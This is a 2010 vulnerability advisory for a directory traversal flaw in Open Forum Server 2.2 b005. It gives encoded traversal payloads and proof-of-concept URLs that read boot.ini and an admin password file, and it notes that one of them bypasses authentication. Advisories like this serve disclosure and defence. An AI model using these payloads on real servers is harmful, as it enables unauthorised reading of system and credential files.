Open Forum Server version 2.2 b005 suffers from a directory traversal vulnerability.
ac2bc5250aed7292e4a1152b4b10e99d4ebcca9792faff40148e2d54b33e2b90
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Directory Traversal #
# Software.................Open Forum Server 2.2 b005 #
# Download.................http://code.google.com/p/open-forum #
# Date.....................5/16/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a #
# specially crafted URL. #
# #
# #
# ##Exploit## #
# #
# %2F../ #
# %5C../ #
# %5C
# #
# #
# ##Proof of Concept## #
# #
# http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini #
# #
# http://localhost/Admin/Users/Admin/private%5Cpassword.txt #
# #
# Note: the percent encoded backslash in the second second url bypasses authentication. However, the #
# response is malformed so a debugging proxy may be necessary to view it. #
# #
#============================================================================================================#